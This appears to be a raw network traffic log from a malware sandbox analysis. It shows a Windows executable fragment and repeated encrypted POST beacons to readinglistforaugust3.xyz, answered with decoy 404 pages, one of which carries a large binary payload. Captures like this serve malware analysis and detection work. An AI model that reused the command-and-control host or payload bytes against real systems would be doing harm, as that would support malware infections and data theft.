00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 01 20 82 45 00 e9 b6 0f 00 00 56 8b f1 c7 06 20 82 45 00 e8 a8 0f 00 00 f6 44 24 08 01 74 07 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_nz$@0Q< @.textln `.rdata@Br@@.data8:@.rsrc@@ EV ED$t
Aug 24, 2021 08:49:13.341062069 CEST	2001	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:13.341114044 CEST	2001	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 87 1c 23 bc d5 4a 98 47 ba bf ab e5 f3 7b Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q#JG{nZ2?"B-ie=V)xPj[^M"GJyT{i^,fXe!,2xjz"8~sQa"aa,e"MAe$
Aug 24, 2021 08:49:13.387263060 CEST	2002	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:13.396722078 CEST	2003	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:13.396758080 CEST	2003	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 22 bc d5 4a 99 47 ba bf 91 f5 d2 3f Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q"JG?p8[ [SY$+-O?YTuq~;kDE)P.6Y0i;N.(^vS)>R]mZ"O[s
Aug 24, 2021 08:49:13.442183018 CEST	2004	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:13.450057030 CEST	2004	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 282 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:13.450113058 CEST	2004	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 25 bc d5 4a 99 47 ba bf ae cd 9b 73 Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q%JGsen;9vQ{pa&G9WT_"_p,U+7aSO[)Y$of_wy9ZKnq;(~KT4QmL@JkUt
Aug 24, 2021 08:49:13.496781111 CEST	2005	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:13.519666910 CEST	2005	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 336 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:13.519705057 CEST	2006	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 24 bc d5 4a 99 47 ba bf 9d 96 c9 74 Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q$JGtn\2-g,g07+SY(Ot1~)aASW[a&9@UxjsB+J\PDgUH=k #Os2Nad
Aug 24, 2021 08:49:13.566477060 CEST	2007	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:13.575030088 CEST	2007	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 182 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:13.575067043 CEST	2007	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 27 bc d5 4a 99 47 ba bf b1 92 c9 38 Data Ascii: lzu!8ITTU^rUc8+n/Zo]fa4!j:Q'JG8}17~g`%$[b=k<WAf\QGI3j~W,9P+Y(c3[
Aug 24, 2021 08:49:13.620245934 CEST	2008	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:13.661973000 CEST	2008	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:13.743571997 CEST	2010	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 00 00 a6 97 8c b4 08 02 7f 77 08 a7 e7 cb 2c c9 aa 43 96 74 c4 0c 23 20 5b f4 75 62 d6 86 a7 f2 12 bc a9 da 62 b6 a0 d6 8e 2a 03 c1 fe f5 78 80 42 09 22 23 7a 2b 5a be 51 83 37 f3 38 8f fd dd 37 2e 52 8c 23 e2 54 03 2c 1e 64 de 43 81 bc a4 b9 18 d8 e0 a3 e5 f9 b6 3f 7c 68 a0 d4 a1 a7 43 ab 78 a6 8f 31 88 43 72 56 b9 f9 4f 85 d1 73 62 c6 80 7d 19 09 03 aa d1 5f fb 83 4a 56 48 b2 50 68 63 5d d5 06 2d e0 35 ad f9 82 5e f3 8f 10 a3 d2 38 14 32 8f d7 8f 4e 9f 01 be 22 be c7 b7 3e cd 87 45 a3 3a d5 a7 5f 81 cb 05 57 0f 79 93 73 72 62 19 93 b5 34 16 e4 9c 32 11 61 7f 14 ef 78 78 30 be 80 f5 fd 31 4f c6 34 5d ee 71 0a 12 63 f7 cc eb 6b f9 22 4f 87 4a c2 2f b2 87 2e fb bc 06 b1 83 34 6b 27 30 77 1b bd 55 16 4a e2 50 47 9a 0e 3a 54 e9 43 82 e4 64 23 64 77 40 57 91 f8 32 2f 05 d5 6e 93 9a b8 04 64 bf 43 ab 56 7a ea 73 6d f1 d5 54 ce 08 cd f7 dd 52 10 bf 3d 1f c8 e6 c6 c6 89 ba 86 a8 a3 15 4d 81 43 1a ff bc c1 94 52 07 2a 22 af 15 27 78 3a 02 f4 74 c6 51 e5 0d bb 27 32 43 c6 48 f8 87 a9 b2 c7 9e 43 b7 af 83 97 e1 1b d3 98 fe 36 5f 10 62 46 52 ef 25 4c 31 5a 4f 52 54 9f 50 c5 0d 60 47 df 1b 68 d3 df 32 78 1d 2d ce d5 02 04 e7 14 ac f9 cc 13 91 3c 7a 54 c9 45 56 36 06 26 50 da 30 f2 0b 8e 39 cd a8 65 17 92 54 67 f4 c1 ed fe 25 0d 1e 5d ea e8 07 3d 23 da 73 a8 38 36 a1 7f 55 b6 65 c8 f6 7d e0 67 b7 c1 21 4d f3 93 bf e9 ab 1c 91 23 0c 14 be a3 a6 65 79 cc 26 56 7a 39 04 8e b3 6f 2d 65 2a e5 83 cb e7 66 93 f8 bd 03 df d7 2d 12 79 ee 2a 49 e8 a8 25 99 a3 a0 cd 1b 38 c0 83 89 02 ed 02 67 3c d8 23 bc b6 b5 b5 2e 5d fb ed 40 2b 16 18 68 5f 30 6f cb 7b 8e 72 b2 2c e1 26 15 94 a8 14 df c9 8b af 46 34 fa da fb 47 95 27 a3 55 67 50 71 c2 1d 60 74 a5 6c 3c 42 57 eb f4 4e 31 1f 21 3b d7 af 49 27 b5 8c 9a b1 20 59 00 73 38 d0 5f 93 7b 4a 51 69 79 13 99 ea 3a c7 da 53 4f b7 4a 87 66 5e 1a a3 de db 28 ff 67 00 df 63 28 2f 3a b8 76 ea 7c ba 35 23 fc c6 05 07 1b 30 d1 b8 1e 7e 25 1f a5 8b 03 5c dd 49 8e 19 6f f4 e9 15 b7 51 19 e2 de d1 75 05 b3 b2 b6 78 65 55 fc c9 45 ab 3a ad 84 bb 95 5a 09 89 66 30 6e 20 9d d0 ab 44 33 40 97 9d 5c eb 9e 48 04 98 f4 df dc 03 c2 ed 6f 20 82 60 4b 66 3a f8 ab da e0 3d 51 1d 7e 80 bf 3a 68 d6 17 41 c3 ac c3 c8 c9 7f 73 06 0c ba f8 27 83 54 24 f8 e5 cc 78 72 1b 60 a0 69 a3 b3 0d 38 51 b9 f6 12 65 8a 16 3e 1f b1 7a 37 ab d6 bb 35 32 8b 60 44 85 d5 79 e1 34 75 3b 71 9b e3 c0 68 f2 c8 79 8e 6b 4e 87 48 ef 18 e2 39 e1 fa 24 d1 76 58 05 e0 f0 b4 2d 91 6c 38 9f 27 ad 0f 44 94 ac f1 cc e6 60 81 e9 1b 56 1f f5 60 e7 aa 77 77 db e3 73 0d b2 19 1f b7 1c 9a 65 6b 2a 27 6e f8 ee 65 44 50 7f c8 c6 aa e8 a7 4b 5d 7e 8f a5 68 cc f6 2f c9 24 c0 0f 0d e9 41 73 d9 66 56 a2 54 d1 c4 a3 85 4b e7 fc bd 6c 72 1d 78 d5 a3 0d a7 9c 13 58 93 db 14 d8 53 d4 25 5f dd d5 84 e2 46 40 28 66 00 32 25 e3 96 d4 c9 e1 e9 25 7a c7 da 66 30 d8 17 e8 b4 31 e9 32 95 37 23 72 74 1f 87 85 ce bf 87 9d 85 aa fd 27 ba ee 4e 81 22 f5 3f a4 86 cc 87 3b fe e1 39 be 29 e1 6b 8d d3 12 bc ed 9a e3 cf 59 ad 28 e3 83 ac 88 af 0c b7 53 8c 3e 85 ad 3d eb 95 d9 ac d0 90 91 ec b0 70 43 9d 8c 28 3c d6 ef ff e6 84 27 ed e4 8f 3b c2 b8 60 95 39 0f cb dc 34 1d 98 ab d7 ef 55 02 53 49 d9 3f 90 d5 13 d1 74 9f 74 6d d4 ca e1 ac 7d d3 b6 35 5e 71 85 87 db 84 ce 1c f0 7f d0 33 d5 61 1b 51 18 63 7c c2 df 1b 47 f7 a1 1c aa 9b 31 46 a2 d7 9f 5d b9 02 9f 71 60 9c a7 3c 90 c4 13 6e d1 1f 14 dc 3a a1 c5 27 8b 3d 4d 7d 36 bd 05 2a a8 79 e8 45 89 dd 94 5b Data Ascii: 3ff66w,Ct# [ubbxB"#z+ZQ787.R#T,dC?\|hCx1CrVOsb}_JVHPhc]-5^82N">E:_Wysrb42axx01O4]qck"OJ/.4k'0wUJPG:TCd#dw@W2/ndCVzsmTR=MCR"'x:tQ'2CHC6_bFR%L1ZORTP`Gh2x-<zTEV6&P09eTg%]=#s86Ue}g!M#ey&Vz9o-ef-yI%8g<#.]@+h_0o{r,&F4G'UgPq`tl<BWN1!;I' Ys8_{JQiy:SOJf^(gc(/:v\|5#0~%\IoQuxeUE:Zf0n D3@\Ho `Kf:=Q~:hAs'T$xr`i8Qe>z752`Dy4u;qhykNH9$vX-l8'D`V`wwsek'neDPK]~h/$AsfVTKlrxXS%_F@(f2%%zf0127#rt'N"?;9)kY(S>=pC(<';`94USI?ttm}5^q3aQc\|G1F]q`<n:'=M}6yE[
Aug 24, 2021 08:49:14.832829952 CEST	2573	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 161 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:14.877988100 CEST	2573	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:14 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:14.904623985 CEST	2574	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 186 Host: readinglistforaugust3.xyz
